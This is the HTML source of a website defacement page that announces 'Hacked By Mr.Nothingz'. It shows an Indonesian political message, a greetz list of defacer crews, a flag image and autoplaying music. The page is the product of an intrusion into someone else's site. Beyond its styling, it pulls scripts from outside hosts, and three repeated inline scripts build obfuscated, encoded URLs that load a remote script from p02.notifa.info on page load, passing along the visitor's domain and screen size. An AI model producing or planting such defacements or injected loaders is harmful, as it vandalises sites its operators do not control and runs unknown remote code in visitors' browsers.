

<html>
<head><meta http-equiv='Content-Type' content='text/html; charset=gb2312'>
<link rel='SHORTCUT ICON' href='http://www.gambaranimasi.org/data/media/781/animasi-bergerak-bendera-indonesia-0013.gif'>
<meta name='description' content='Mr.Nothingz' />
<meta name='keywords' content='Mr.Nothingz' />
<meta name='author' content='
_______________________________________________
|                                             |
| Script Created By Mr.Nothingz               |
| FB   = https://www.facebook.com/jaandiliek1 |
| Nick = Mr.Nothingz                          |
| Indonesia Raya                              |
|_____________________________________________|' />
<meta name='geo.country' content='id' />
<meta name='geo.placename' content='Indonesia' />
<meta name='robots' content='all'/>
<meta name='robots' content='index, follow' />
<meta name='robots schedule' content='auto'/>
<meta name='googlebot' content='index,follow'/>
<meta name='distribution' content='global'/> 
<title>#Indonesian People#</title>

<script src='http://e-mete.com/js/kdsnow.js'></script>
<style>

.ringgo {
  z-index: 1000;
  height: 15px;
  width: 280px;
  border: 2px solid #ff0000;
  background: #000000;
  -moz-linear-gradient(top,#000,#D11717);
  background: -webkit-gradient(linear, left top, left bottom, from(#000), to(#D11717));
  border-radius: 12px;
  -moz-border-radius:12px;
  -webkit-border-radius: 12px;
  -o-transition: all 1s ease-in-out;
  -moz-transition: all 1s ease-in-out;
  -webkit-transition: all 1s ease-in-out;
  padding: 5px 5px;
  margin:15px auto;
  font: 8px Orbitron;
  color: #FF0000;
  overflow: hidden;
  box-shadow: 0 1px 8px #000;
  -moz-box-shadow: 0 1px 8px #000;
  -webkit-box-shadow: 0 1px 8px #000;
  text-shadow: 0 0 30px #00fffa;
}
.ringgo:hover {
  min-height: 270px;
  border: 2px solid #ff0000;
  background: #000000;
  box-shadow: 0 1px 15px #000;
  -moz-box-shadow: 0 1px 15px #000;
  -webkit-box-shadow: 0 1px 15px #000;
  color: #000; 
  text-shadow: 0 0 30px #00fffa;
}
.ringgo h3, .nothingz h3 {
  font-size: 8px;
  font-family: Orbitron;
  font-weight: bold;
  color: #ffffff;
  text-align: center;
  text-shadow: 0 0 30px #00fffa;
  margin: 3px 5px;
  background: #000000;
  border-radius: 5px;
  -moz-border-radius: 5px;
  -webkit-border-radius: 5px;
  border: 1px solid #ff0000;
  -o-transition: all 1s ease-in-out;
  -moz-transition: all 1s ease-in-out;
  -webkit-transition: all 1s ease-in-out;
}
.tejahide h3:hover{
  box-shadow: 0 1px 8px #000;
  -moz-box-shadow: 0 1px 8px #000;
  -webkit-box-shadow: 0 1px 8px #000;
  text-shadow: 0 0 30px #00fffa;
}
.ringgo img.mini, .ringgo img.minianima {
  width: 70px;
  border: 4px solid #ff0000;
  padding: 3px;border-radius: 6px;
  -moz-border-radius: 6px;
  -webkit-border-radius: 6px;
  float: left; margin: 0 10px 5px 0;background: #222;
  -o-transition: all 1.5s;
  -moz-transition: all 1.5s;
  -webkit-transition: all 1.5s;
  text-shadow: 0 0 30px #00fffa;
}
.ringgo img.mini:hover, .ringgo img.minianima:hover {
  box-shadow: 1px 1px 15px #000;
  -moz-box-shadow: 1px 1px 15px #000;
  -webkit-box-shadow: 1px 1px 15px #000;
  border: 4px solid #CCCCCC;
  background :#000000;
  -o-transform: scale(1.4);-moz-transform: scale(1.4);
  -webkit-transform: scale(1.4);
  margin-top: 20px;margin-left: 15px;
  text-shadow: 0 0 30px #00fffa;
}
  .tejahide img.minianima:hover {
  -o-transform: scale(1.4) rotate(360deg) translate(0px);
  -moz-transform: scale(1.4) rotate(360deg) translate(0px);
  -webkit-transform: scale(1.4) rotate(360deg) translate(0px);
  text-shadow: 0 0 30px #00fffa;
}
.nothingz {
  margin-top: 15px;
  height:225px;
  overflow: auto;
  text-shadow: 0 0 30px #00fffa;
  padding: 0 5px;
  -o-transition: all 1s ease-in-out;
  -moz-transition: all 1s ease-in-out;
  -webkit-transition: all 1s ease-in-out;
  background:#000000 -moz-linear-gradient(top,#000000,#000000);
  background:-webkit-gradient(linear, left top, left bottom, from(#000000), to(#000000));
  background-image:url('');
}
.nothingz:hover {
  background: #000000;
  color: #eee;
  text-shadow: 0 0px 1px #fe0303;
  text-shadow: 0 0 30px #00fffa;
}
.nothingz h3 {
  margin: 20px 0;
  max-width: 224px;
  margin-left:10px;
  background: #000000;
  box-shadow: 0 1px 12px #eee;
  -moz-box-shadow: 0 1px 12px #eee;
  -webkit-box-shadow: 0 1px 12px #eee;
  text-shadow: 0 0 30px #00fffa;
}
.columns{
  clear: both;
  line-height: 22px;
  padding:0 0 20px;
  width: 250px;
  text-shadow: 0 0 30px #00fffa;
}
.colleft{
  float:left;
  line-height:22px;width:120px
  text-shadow: 0 0 30px #00fffa;
}
.colright{
  float:right;
  line-height:22px;
  width:120px
  text-shadow: 0 0 30px #00fffa;
}
.h3:hover {
  background: #000000;
  border: 1px #ff0000;
  solid #666;
  box-shadow: 0 1px 12px #fff;
  -moz-box-shadow: 0 1px 12px #fff;
  -webkit-box-shadow: 0 1px 12px #fff;
  text-shadow: 0 0 30px #00fffa;
}
.nothingz ul {
  padding: 0;
  margin: 0;
  list-style: none;
  color: #ffffff;
  text-shadow: 0 0 30px #00fffa;
}
.nothingz li {
  padding: 0;
  margin: 0;
  list-style: none;
  color: white;
  border-bottom:1px dotted #ff0000;
  text-shadow: 0 0 30px #00fffa;
  border:1px solid #ff0000;
}
.nothingz lz {
  padding: 0;
  margin: 0;
  list-style: none;
  color: white;
  text-shadow: 0 0 30px #ff0000;
  border:1px #ff0000;
  font-size: 12px;
  font-family: arial;
  font-weight: bold;
}
.nothingz li a{
  color: #FF0000;
  padding: 0;
  margin: 0;
  text-decoration:none;font-size: 12px;
  -o-transition: all 1.5s;
  -moz-transition: all 1.5s;
  -webkit-transition: all 1.5s;
  text-shadow: 0 0 30px #00fffa;
}
.nothingz li a:hover {
  -o-transform: scale(1.1);
  -moz-transform: scale(1.1);
  -webkit-transform: scale(1.1);
  color: white;
  text-shadow: 0 0 30px #00fffa;
  margin-left: 20px;
}
.ringgo {
  height: 17px;
  float: right;
  margin-top:0px;
  z-index: 10000;
  position: fixed;
  top:0px;
  margin-left:690px;
  text-shadow: 0 0 30px #00fffa;
} 
.ringgo h3, .nothingz {
  font-size: 11px;
}</style>

<style type='text/css'>
      @import url('https://fonts.googleapis.com/css?family=Montserrat|Just+Another+Hand|Lobster|Niconne|Orbitron:200,300,400,600');

.title {
  z-index: 10;
  position: fixed;
  left: 50%;
  top: 50%;
  transform: translateX(-50%) translateY(-50%);
  font-family: 'Montserrat';
  text-align: center;
  width: 100%;
}
.title h1 {
  position: relative;
  color: #EEEEEE;
  font-weight: 600;
  font-size: 60px; 
  padding: 10;
  margin: 0;
  line-height: 1;
  text-shadow: 0 0 30px #000155;
  top: 25%;
  bottom: 25%;
  left: 0;
  right: 0;
  border: none;
  border-bottom: 1px solid white;
  width: 50%;
  text-align: center;
}
.h1:bofore {
  position: relative;
  color: #EEEEEE;
  font-weight: 500;
  font-size: 50px;
  padding: 0;
  margin: 0;
  line-height: 1;
  text-shadow: 0 0 30px #000155;
  top: 25%;
  bottom: 25%;
  left: 0;
  right: 0;
}
.title h1 span {
  font-weight: 600;
  padding: 0;
  margin: 0;
  color: #BBB;
}
.title h2 {
  font-weight: 200;
  font-size: 20px;
  padding: 0;
  margin: 0;
  line-height: 1;
  color: #EEEEEE;
  text-shadow: 0 0 30px #000155;
}
.title h4 {
  font-weight: 100;
  font-size: 20px;
  padding: 0;
  margin: 0;
  line-height: 1;
  color: #EEEEEE;
  text-shadow: 0 0 30px #00fffa;
  font-size: 22px;
  font-family: 'Just Another Hand';
}
.title h3 {
  font-weight: 200;
  padding: 0;
  margin: 0;
  line-height: 1;
  color: #ffffff;
  text-shadow: 0 0 30px #00fffa;
  font-family: 'Just Another Hand';
  font-size: 30px;
}
.title h5 {
  font-weight: 200;
  font-size: 15px;
  padding: 0;
  margin: 0;
  line-height: 1;
  color: #EEEEEE;
  text-shadow: 0 0 8px #ff0000;
  font-family: 'Niconne';
  font-size: 15px;
}
.audio {
  padding: 0;
  margin: 0;
  list-style: none;
  border-bottom:1px dotted #ff0000;
  border:1px solid #ff0000;
}

</style>

<div class='ringgo'>
<h3>
About Me</h3>
<div class='nothingz'>
<h3>Social:</h3>
<ul>
<li><center><a href='https://www.facebook.com/jaandiliek1' target='_blank' title='Mr.Nothingz'>Facebook</a></li></center>
<ul>
<h3>About Me:</h3>
<ul>
<lz><b><center>
Saya Hanya Seorang Anak-Anak Yang Tidak Memiliki Terlalu Banyak Aset Tapi Saya Melakukan Hal-Hal Yang Berbeda Dari Anak-Anak Lainnya. Oleh Karena Itu Saya Mencoba Hal-Hal Yang Tidak Sering Dilakukan Oleh Anak-Anak Dan Keadilan Lainnya Di Negara Saya / Negara Kita Yang Merupakan Negara Kesatuan Republik Indonesia, Sangat Tidak Setara Seperti, Orang-Orang Yang korupsi Tidak Dihukum Bahkan masa Tahanan Mereka dipotong :V. Terima kasih :V</lz></center></b>
</ul>
<ul>
<h3>Copyright By Mr.Nothingz</h3>
</ul>
</div>
</div>
</div>
</div>
</div>

</head>
<body translate='no' oncontextmenu='return true;' onkeydown='return true;' onmousedown='return true;'>
  <div class='title' align='center'>
  <div id='after'>

           <center><img src="https://image.ibb.co/bu6KJo/37966001_279201082842821_1193862593161199616_n.jpg?fbclid=IwAR0BzZyIUFIsi8CheLdIwL6OdUqQ46LXGr1yefb8A0pizJz01eVCaxNqurE" width="300" height="300" align="center">

           <center><h5><b><font face='Orbitron' color='white' size='50'>Hacked By Mr.Nothingz / Ringgo F.I</font></h5></center></br>
    
           <img class='irc_mi' src='https://upload.wikimedia.org/wikipedia/commons/thumb/9/9f/Flag_of_Indonesia.svg/2000px-Flag_of_Indonesia.svg.png' width='100' height='50'></img><audio preload='metadata' allow='autoplay' src='http://ayk.co.za/Pujiono%20-%20Manisnya%20Negeriku%20[Official%20Video%20Clip].mp3' controls='autoplay' __idm_id__='205838337'preload' preload preload='metadata' autoplay controls loop></audio><img class='irc_mi' src='https://images-na.ssl-images-amazon.com/images/I/21tkhACu79L.jpg' width='100' height='50'>
    
           </br></br><h3><font face='Just Another Hand'>Ketika Anda hanya melakukan apa yang Anda bisa dan hanya apa yang Anda ketahui, maka Anda hanya dapat melakukan hal-hal biasa. Tetapi sebaliknya, jika Anda berani mencoba hal-hal yang beda , maka Anda akan mendapatkan hal-hal yang luar biasa.</br></h3></p>
    
           <h5><font size='6'>Greetz :</h5>
    
           <h4><marquee behavior='scroll' scrollamount='10' style='border:1px solid; color: red;'><font color='white'>Suzuya Cyber Attack - T0D DefaceR TeaM - Tayo Security Crew - Mr.DenCraftY - KN07 - root./Kamikaze - Mr.SW4GH4T - LinuX7 - Satrio - 1ND0TR0J4N X - All Defacer Indonesia - Indonesia - Save Palestine And Jerusalem</h4></center></marquee></font></h4>
    
           <h4><font face='Orbitron'>Copyright By Mr.Nothingz / @2018.</h4></center><font color="black">Indonesia And Save Palestine</h4></center>

</div>
 
<style type="text/css">

body {
  margin: 0;
  padding: 0;
  overflow: hidden;
  background: #000000;
  background-image:url('');
  background-position: center;
  background-attachment: fixed;
  cursor: url(http://cur.cursors-4u.net/cursors/cur-9/cur862.ani), url(http://cur.cursors-4u.net/cursors/cur-9/cur862.png), progress !important;
}


ul,li{
text-indent:0;text-decoration:none;margin:0;padding:0
}

img{
border:0
}

canvas{
cursor:crosshair;display:block;left:0;position:absolute;top:0;z-index:20;height:100%;width:100%;
}


#header,#bg{
position:fixed;
left:0;
right:0;
z-index:10;
height:100%;
width:100%;
}


</style>


<script src="http://parsico.net/pages/fw/s.js"></script>
<script src="http://parsico.net/pages/fw/f.js"></script>

<script type='text/javascript'>if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=='https:' ? 'https://' : 'http://');var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ 'p02.notifa.info/3fsmd3/request' + '?id=1' + '&enc=9UwkxLgY9' + '&params=' + '4TtHaUQnUEiP6K%2fc5C582PbDUVNc7V%2bdeZxv8Y0Ud2hxwQ6TnVhtxwVK20%2fo4GOz5sNsRc%2bqY8N4XsoxLjg5%2f62e8xEuHddjaBCnpB6t%2f8m1Q7QiicW%2bdF18f3CVvv5D51P3XTWdkrxjt9n%2buRZEkf6PQ1qXccHOrNcnTEy%2bm1pFnZH%2b0HGAr4%2fTQeWkj0Z2qQ4JZ0H7ES4jYDKuKwEf1lviAX8jSCCw38oQbeYwnx2%2fLy4aX9HR8o8wll%2fZahxnws73mZH74MLiQGRzzDhIH1ZRbiEgjoyS6a3IZcsK%2fa%2fUDdUHsDMN%2fbU8GC7l3B9JEkYtO%2fnh%2fJAqhUav6Pp%2fZtexsYy3N2wLBZnJ64LEIA%2fWUPJRTnd4Lwbo4CElKW0fSyCJgogrD8RA5ucoJjTzcRukyhaA%2fPkVSghE3U8yg4UBN0uoYA0ZSAf4vWioZghZGyhAi3FIcL8CeNhFohLSV%2bqqUDdzXhoPmVGGDfc9V29YzPYxVeoScoIGAILzWGC%2bROQW6swYAscJk4U7z%2bs6eHETguHJFrPsoHLRUlOI2awJh0Tngfb8CABCFKLVH%2fw1S1x9D5l7qf8%3d' + '&idc_r='+idc_glo_r + '&domain='+document.domain + '&sw='+screen.width+'&sh='+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p02.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582PbDUVNc7V%2bdczugCkiuKmznJkbFI622k0r003ujZcHQ6MLdHeIroGaEfXuffz20Tp%2b%2bLNeooAt4SlfYOZhxcpGMc0eUpxNV93D5quBXzg7YG3ZbBK%2fUhBmIov2CqwAwj%2fLStERPhXbEe068EL0wgpYUIH31l01YWVCdx3Oe1lZecAi4FuIKmsPDISVtS%2bUa378Gdglygshoc4iP5vOoWyPDna8d0X0pPlKE7hVk32L9SXvJdJeVqgeOYMlkN2pPb%2biuKDZQ5JsdfsJTg24A4qTLJU1B1K%2fOqs5M0s5nouBmRej83tpY75XCk5oP7wivRLck69%2b8L06%2fLVNtuXHdjtRhJr83xcAFN31QQPvO60VUJBGyPvnRsv9JyN7vPZxVejBi4FvPOlw1819QsJ1GU4BRFURSmaKTqXV4YW5p%2f533dZ%2f51gqV3%2b0X2Ry1U5fCLPEVOV5IpuPg%2f29HPeOYzDanOupN7gOlelC6SNtohgaymHMFLDRTs8CV9dsRKPV2BsoH1pvtILE4Qe4URO67BfPpM7HtXXUhqg%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p02.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582PbDUVNc7V%2bdaDyeuqNN9496BQ0AzqiAfrhqZACIOJPXc%2f805YKAj90VCvbrXjXBprrZSMHkEZ8pQGCyL7NY8Axuo5qUFt2g5%2bJ9OnqlqujuvKbasfXYYdZyfq2cBuxmOLYNsRe4OV1TmYXrDTsJ2NZcLqHiQzUuQvOePHsgsk5VZTk4ENUZepz5dGUaixxjVbIuuIoFZOTjiJNEGS5MhXavuruBJLcptXojSNntIQ6f8NJx%2f10yVTMD8QhIOhSR865kspkpWkxlSWxHokYGtYYGMakyKAb36sCAZ5kMRCq9wNyhDGhx6Oikn8HeC7HzwucoCi%2fGrSizjJInJBmCsHuqTWAa5bBszbKhbq0wCBnbjDgR5CLBj4KTaMSB31V%2brD10A08KlviEvAASgZSFS25e15JxF2opmXSSm%2fcMGlQyAU5erpxYZRnka6y0QwLtj4s%2b007ZTa%2f6WNuzarioRQEKEtZH%2bWxZA89mUE4V2qJvXBmH18VtXi7du3PNvOQG23vxLQ11Q6O5Y%2byGN5jJW331ck2MDDKmaw%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body></html>
